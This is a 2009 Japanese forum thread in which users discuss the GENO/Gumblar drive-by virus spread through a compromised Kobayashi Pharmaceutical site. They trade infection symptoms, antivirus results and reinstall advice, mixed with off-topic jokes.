Avast!では「トロイの木馬」型として検出されたよ。
しかしPC教室のサイトまで感染してたなんて。

【レス抽出】
対象スレ：【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性（小林製薬）[09/05/14]
キーワード：糸ようじ

抽出レス数：20

ｗｗｗ

>>888
UACを切ってなければ今のところ大丈夫なはず。

小林製薬のメールマガジンから、お風呂の裏技みたいなページを読んだ
次にPCを開いた時、エクスプローラーが起動しなかった（画面に何も表示されず）
ので、タスクマネージャから自力で起動、スタートアップ項目も思いつくやつは自力で起動
この時点では、たんにPCの不調という認識だった

翌日、小林製薬からお詫びのメール、タイミング的に感染した可能性が高い
コマンドプロンプト起動不可、レジストリエディタ起動不可
sqlsodbc.chmファイルのサイズは1.29KB（1323バイト）
紹介されていたサイトのオンラインスキャンを実施
見つかったのはTrackingCookie数個だけ、すべて除去

現時点では、まだ不具合は解消せず、泣きそう

感染済みの場合は
ノートンしか反応しない
ノートンあったら大至急入れろ

ActivX切っておけば大丈夫じゃないのか

>>896
容赦なくOS再インスコ
これしかない

>>896
ひでえｗ
罠のようだ・・・

>>896
ご愁傷様ですとしか言いようが…
現時点では本当に可哀想だが対処法は>>899しかない。
FTPは使ってないよな？絶対使うなよ！

安置ウイルスソフトとかSpybot入れてれば二段階で防止できたのに、
御愁傷様、

トロイの木馬から新型インフルエンザまで効く
小林製薬の抗ウイルス剤ソフトの宣伝じゃないの？

>>902
>>902
>>902

小林製薬「閲覧　その前に」

感染の有無をチェックする簡易検査法

スタート→ファイル名を指定して実行→regedit.exe

「レジストリ・エディタ」が起動すればシロ。
ちなみに「レジストリ・エディタ」はいじらずに閉じましょう。
下手にいじると危ないです。

このまえウイルスバスターをコンビニ支払いで更新したばっかなんだけど
ＰＣを再インストールしてウイルスバスターを入れなおした場合どうなる？

見逃すとか目立たないとか言うけど
2chの一板が全てじゃないでしょう

>>907
最インスコ前にシリアルナンバーメモっとけばおｋ

>>907
インストール用のアカウントとかあるなら再インストールできるんじゃないか？

糸ようじ
エッチデーデー

>>909
ありがと

ウイルスバスターはいつごろＧＥＮＯを感知駆除できるようになるかな
早くして欲しい

>>910
ありがと
はがきみたいなのにシリアル番号あったわ

プニルからFFに乗り換える
良い機会になったｗ
便利すぎ泣いたｗ

　　　　 ＿＿＿＿＿＿＿＿＿＿___
　　　／|：： ┌──────┐ ：：|
　　/.　 |：： ｜　　AVAST!　　｜ ：：|　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　　|....　|：： ｜GENOウイルス｜ ：：|　　　|　　よっしゃ。安心して開けてられるな。
　　|....　|：： ｜　感染を防止　｜ ：：|　　　＼＿　 ＿＿＿＿＿＿＿＿＿＿＿　
　　|....　|：： └──────┘ ：：|　　　　　　∨
　　＼_｜　　　 ┌────┐　　 .|　　　　 ∧∧
　　　　 ￣￣￣￣￣￣￣￣￣￣￣　.∬　 ( 　＿)
　　　　　　　　　　　　　／￣￣￣￣￣旦￣(_,　　 ）
　　　　　　　　　　　 ／　　　　　　　　　　　　　＼ 　｀
　　　　　　　　　　　|￣￣￣￣￣￣￣￣￣￣＿|、＿）　
　　　　　　　　　　　 ￣|￣|￣￣￣￣￣￣|￣|
　　　　　　　　　　　　　￣　　　　　　　　　　￣
　　　　 ＿＿＿＿＿＿＿＿＿＿___
　　　／|：： ┌──────┐ ：：|
　　/.　 |：： ｜全撃墜ソフト　｜ ：：|　
　　|....　|：： ｜AhnLab-V3　　｜ ：：|　　　
　　|....　|：： ｜AntiVir　AVG　｜ ：：|　　　／￣￣￣￣￣￣￣￣￣￣
　　|....　|：： ｜ Kaspersky　　｜ ：：|　　　|　いやー遊んだ遊んだ…。　アレ？
　　|....　|：： ｜McAfee　Micro｜ ：：|　　　＼＿　 ＿＿＿＿＿＿＿＿
　　|....　|：： └──────┘ ：：|　　　　　　∨
　　＼_｜　　　 ┌────┐　　 .|　　　　∧∧
　　　　 ￣￣￣￣￣￣￣￣￣￣￣　.　　 ( 　＿)
　　　　　　　　　　　　　／￣￣￣￣￣旦￣(_,　　 ）
　　　　　　　　　　　 ／　　　　　　　　　　　　　＼ 　｀
　　　　　　　　　　　|￣￣￣￣￣￣￣￣￣￣￣|、＿）　
　　　　　　　　　　　 ￣|￣|￣￣￣￣￣￣|￣|￣

はじめて糞VISTAが役に立ったｗ

>>906
もうその情報は古いがな。
レジストリエディタ立ち上がっても感染してる場合もあるがな。

今のところはXPならsqlsodbc.chmのサイズと更新日で判断するって事になってる。
でもウイルスが更に進化してて、これも偽装するようになってたら・・・

これ、ヴィスタは感染しないのか？

はは〜。するってえと、ＸＰを市場から消して、時期ウィンドウズの販売を促進させようとする
マイクロソフト社の陰謀だな。

奴らならやりかねない。

アメブロ狙ってスイーツ(笑)一掃すればいいのに

警鐘age

「小林製薬のいとようじ！」　ｂｙ　大泉洋

>>921
このウイルスに感染するとエッチデーデーが大変なことになると言うのにお前と来たら

>>922
大泉の知り合いの電気屋乙

このウイルスに感染するとエッチデーが大変なことになると言うのにお前と来たら

>>923
従兄弟の車屋さんじゃなかった？

エッチデーデーで何の違和感も無いが、一般人はエイチディーディーなんだろうなあ。電話でフォネティックとか
使ったこと無いんだろうなあ。

>>923>>925
従兄弟の車屋のみっちゃんな。家全部にエッチデーデーはいってるからな！

>>925
>>927
ｽﾏｿ　俺の記憶違いだったみたいだ。
にしても水どうファンは良い人が多いな。

なんで水どうスレになってんだよｗｗon

糸ようじあげ

このウィルス用のマスク早く作ってくれ
マジ怖い

エッチデーデーだから大丈夫だろ

>>926
ヘンリー・デルタ・デルタ？

ふなむし〜

これって、感染状態でLAN切って立ち上げると、BSODなんだよな？
姉貴のパソがそれっぽい症状なんだが･･･。

>>906
やってみたら起動したからセーフ…なのかな

欠陥商品しか売らないマイクロソフト史上、紛う方なき真性の欠陥商品だの
ME以上の糞OSだの、
「VISTA使ってんの？Mなの？バカなの？朝鮮人なの？ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ〜」ってさんざんバカにされてきたけど、
使っていればいいこともあるんだな…

POWRE USER使えば良いだけじゃん
別にVISTAじゃなくても良いと思うんだが
ここの連中は管理者でログインしっぱなしなのか？
そっちの方が問題だと思うが。。、

ねえねえ　感染サイトにアクセスして　感染を検知する　ソフトはマダでないの？

AVASTちゃん

>>939
マジ？ノートンとかバスターとかの大手のやつ対応してないの？？
そんなにむつかしいことなんだろうか

あ　誤解しないで
バスターもノートンも対応したみたいだから
ただAVASTは無料なのに一番始めに検知していたエロいやつだったんで

やっとウィルスバスター来たのか
長かったな〜もう今週は無理かと思ってた

早く次スレになれage

2年ぶりにノートン先生更新するか？

なんか「さっさとvista以降に買い換えろよﾌﾟﾌﾟﾌﾟ」と言われてるような気がしてならない。
これからは新しいOSがでるたびにウィルスが猛威を奮うんじゃなかろうな。

なんか亜種が多いっていう書き込みをよく見るんだが
そういうのにも対応してるのかね

>>945
？
それならむしろリスク回避のためMSから乗り換える人が増えるのでは？

ttp://headlines.yahoo.co.jp/hl?a=20090520-00000011-rbb-sci

Yahooニュース来ましたよ。

>>941
トンです。

サイト改竄情報がいちばん速いのは・・・　２ちゃんかも知れんな

>>934
感染しているかどうか確かめて、
してたら、クリーンインストール。

>>934
できれば
これやってみて下さい
http://geno.2ch.tc/#h

>>947
ライトユーザーはあんまりそういう選択肢もてないような気がする。

flashのサイトみただけで感染するウィルスが流行りつつあるみたいだし
http://headlines.yahoo.co.jp/hl?a=20090520-00000011-rbb-sci
これを機にsilverlightがはやるなんてことは…

いわゆる“GENOウイルス”が猛威、G DATAがその挙動を解説
http://internet.watch.impress.co.jp/cda/news/2009/05/20/23509.html

G DATA Software株式会社は20日、いわゆる“GENOウイルス”が日本で猛威をふるっているとして、
その挙動を解説するとともに、インターネットユーザーに対策を呼び掛けている。

日本の通販サイトや同人サイトが感染被害

　このウイルスは、Adobe FlashやAdobe Reader/Acrobatの脆弱性を突き、ウイルスを仕込んだサイトに誘導することで感染を試みる。

何かをクリックしたり、ダウンロードしたりしなくても、細工されたWebサイトをブラウザで
開いただけで感染する「ドライブバイダウンロード」と呼ばれるものの一種にあたる。

　G DATAによると、4月ごろから日本企業のWebサイトや個人サイトなどが改ざんされる被害が多発しており、
実際に感染被害に遭ったPC通販サイト「GENO」の名前をとって、ネット上では“GENOウイルス”と総称されている。

5月中旬にはアニメや漫画、ゲームなどの同人サイトが連鎖的に感染するに至り、
「昨今の豚インフルエンザのパンデミックと重ね合わせて、現在ややパニック状態に陥っているのが現状」。

>>955
一介のPCパーツ屋の名前が、どんどん広がっていくな・・・
宣伝効果は計り知れない・・・

小林製薬の糸ようじ

GEN○

ネット社会を脅かすのは麻薬と同じくらい重罪

>>956
PC関係者なのに対処法を「クッキー削除して下さい」で済ませた
伝説を残したから

>>960
ちょっと違う
http://www.geno.co.jp/webshop/okyakusama.html

＞お客様側の対処といたしましてはwebブラウザのキャッシュをリセットして頂く事をお願い致します。
＞尚、サーバーのウィルス感染や個人情報の流出はございません。

もうね、悪意のあるレベル。
日本におけるパンデミックは、このGENOの対応に大きな原因があると言っても過言じゃない。

どうオタはそろそろ自重してくれ

なんか感染しそうで>>961を怖くてクリックできんｗ

まあもうぐぐるにもこの名称じゃないと
情報が上手く拾えないからなあ

注意喚起あげ

　　　　　　　_,,-''￣￣`-､
　　　 　　 ／　　　 　　　　＼
　　　 　 ,/ 　　　　　　　　　 ＼
　　　　 /　　　―　 ―　　 　 ヽ
　　　　lヽ　　-　､ !　, _ 　　　　|
　　　　|r――-､_⊥ ,――'-､　|,-,
　　　　|::::::::::::::::/　|ヽ:::::::::::::::|-|'ｲ!|　<Genocide
　　　　 ﾄ､＿_,,/: 　|: `､＿_,,/ ,|ｿ/
　　　　 .|　　 　､_ j| _,､ 　　　 ,|-'
　　　　　| 　 /lll||||||||||l`､　 　,|
　　　　　`i　,|||'￣=￣`|||､　/ ト、
　　　　　｢|ヽ|ll||||||||||||||||| /i　|::::＼
　　　　/:::::＼`!!||||||||||||!!' 　　|::::::::＼
　　　/::::::::::::::`ー-､.._　i 　 　 |::::::::::::::＼
　　/:::::::::::::::::::::::::::::::::::`ｰ-､.　|::::::::::

クソワロタ

>>917
未だにいたちごっこ状態なのか？

マスクをすれば感染は防げる。

うちのPC、熱があるみたいなんだけど・・・

WindowsとMac以外にも便利に使える新しいOSって出ないものなのかな

これってGENOが原因なのか？

>>970
つ□　冷えピタ

これって、ネットワークＰＣにも感染すんの？

martuz.cnが閉鎖して、落ち着いた感じはあるけど
この静けさが逆に怖いなー・・・

>>966
ロブさん何してんすか

>>971
Linux系はまさにそれじゃないの？
ネット見たりメールしたりなら十分だと思うけど。

>>975
別の国のドメインに移動してそれがまた閉鎖したような？
情報が錯綜してわけわかめ

まだ終わったわけじゃないんだよな……

>>975
攻撃サイトは、zlkon.lv（ラトビア）→gumblar.cn（中国）→martuz.cn（イギリス）って
移って行って、最新のmartuz.cnが、今停止状態。

またどこかに移動するのか、これで攻撃やめるか。後者だと良いんだけどね。

小林製薬の糸ようじ

>>980
前者が濃厚という・・・・・・

早く終息しないかな

ちょ、まだこのスレ終わってないのかよｗ
埋めろ埋めろ、糸ようじでも何でもいいからｗ

これまだウィルスソフトは検出は出来るけど駆除はできないんだよね?

とりあえず注意喚起あげ

そうなのよ、結局感染したらクリーニンスコ一択。
現在は沈静化してるけど、これからまたどうなるかわからない。
（今までの例からして、ホスト移動して再攻撃はじめるのは週末じゃないかと言われてる）
だから早いとこ2スレ目が立って欲しいんだけんども。

>>985
えー
再インストールめんどくさいな

クリーニンスコって何だよ。
クリーンインスコ（クリーンインストール）です、失礼。

　　ク　　リ　　ー　　ニ　　ン　　ス　　コ　　

やめてぇぇ！もう放っておいてぇぇ！

以後1000までクリーニンスコで埋まります

ああ、もうそれでも良いよ。

クリーニンスコ！

逆に考えるんだ。クリーニンスコは欧米式発音であると考えるんだ。

クリーニンスコ に一致する日本語のページ 24 件中 1 - 24 件目 (0.43 秒)

良かった自分だけじゃなかった！


・・・少ねえ・・・。

よーし　１０００取り合戦だ　いくぞ！！

ふみだい

1000なら今週末亜種発動

>>995
人いねーから合戦にならねえｗ

↓どうぞ

じゃあ1000なら皆クリーニンスコしないで済む！

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。